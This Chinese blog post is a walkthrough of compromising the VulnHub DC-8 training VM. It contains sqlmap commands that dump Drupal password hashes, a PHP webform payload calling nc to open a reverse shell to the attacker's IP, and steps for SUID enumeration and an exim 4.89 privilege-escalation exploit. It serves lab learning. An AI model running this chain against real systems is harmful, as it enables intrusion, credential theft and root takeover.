记录一次vulnhub靶场——DC8的渗透测试过程

0x00 靶场环境搭建

DC8下载链接

下载完成之后导入vmware或者virtualBox,网卡改为nat模式或仅主机模式(方便信息收集)

0x01 信息收集

arp-scan -l 扫描同号段发现靶机IP地址,直接nmap走起发现靶机开了80、22端口

img

img

尝试爆破了22端口,结果没用,但是在80端口web页面有一个cms,发现是一个Drupal的一个cms但是并没有发现相关的cms爆出的洞,于是我们随意点击一些链接发现存在报错注入

img

img

img

0x02靶场渗透

那么直接使用sqlmap一把梭试试,成功跑出两个用户名密码

sqlmap -u "http://192.168.94.213/?nid=3" --risk=3 --level=5 --batch --dbs

img

img

sqlmap -u "http://192.168.94.213/?nid=3" --risk=3 --level=5 --batch -D 'd7db' --tables

img

img

sqlmap -u "http://192.168.94.213/?nid=3" --risk=3 --level=5 --batch -D 'd7db' -T users --columns 

img

img

sqlmap -u "http://192.168.94.213/?nid=3" --risk=3 --level=5 --batch -D 'd7db' -T users -C name,pass --dump

img

img

使用john破译出一个明文密码:turtle,使用御剑扫描出robots.txt,并发现后台管理员登录的地址,使用john用户名与爆破出的密码成功登录后台

img

img

img

img

img

于是寻找上传点,[Contact Us](http://192.168.94.213/node/3)->Webform->Form settings

img

img

<?php system("nc -e /bin/bash 192.168.94.207 4444");?>

img

点击保存

img

Kali linux开启监听,并回到Contact us填写内容进行提交并处罚反弹shell木马返回至kali当中

img

img

img

使用python创建一个伪终端(PTY)并执行交互式的 Bash shell

python -c 'import pty;pty.spawn("/bin/bash")'

img

0x03权限提升

尝试查找suid文件来进行提权

find / -perm -u=s -type f 2>/dev/null 

find / -user root -perm -4000 -print 2>/dev/null

这两个命令都是用于在 Linux 系统中查找具有 SUID 权限设置的文件。它们的作用是相同的,只是使用了不同的方式来查询。

第一个命令 find / -perm -u=s -type f 2>/dev/null 使用 -perm -u=s 来查找具有 SUID 权限设置的文件,而第二个命令 find / -user root -perm -4000 -print 2>/dev/null 使用 -user root -perm -4000 来查找属主为 root 并且具有 SUID 权限设置的文件。

在这两个命令中,-perm -u=s 和 -perm -4000 都表示查找具有 SUID 权限设置的文件,-type f 用于限定搜索结果为普通文件,-user root 用于匹配属主为 root 的文件。

2>/dev/null 是将标准错误输出重定向到 /dev/null,这样可以隐藏权限不足等错误信息,让输出更清晰。

img

找到一个exim4的程序,于是查看exim4的具体版本号,则为exim4.89,返回kali中搜索对应的提权程序

img

img

接着进入改目录并使用Python搭建一个简单的web服务,然后下载至靶机当中进行提权。

img

在此目录我们发现没有权限下载,那么我们进入tmp目录进行下载

img

在Linux系统中,/tmp目录通常用于存储临时文件。这个目录通常被用于存放程序在运行过程中产生的临时文件,例如临时的缓存文件、临时的交换文件等。这些文件在系统重启时会被删除,因此不适合用来存放重要数据。

/tmp目录对所有用户都是可写的,这意味着任何用户都可以在这个目录下创建、编辑和删除文件。由于/tmp目录是共享的,所以需要注意确保在该目录下创建的临时文件不会影响其他用户或系统运行。

img

于是我们直接赋予777权限,并运行此提权程序

img

img

img

成功提权并找到flag值!

  • 28
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

旺仔Sec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值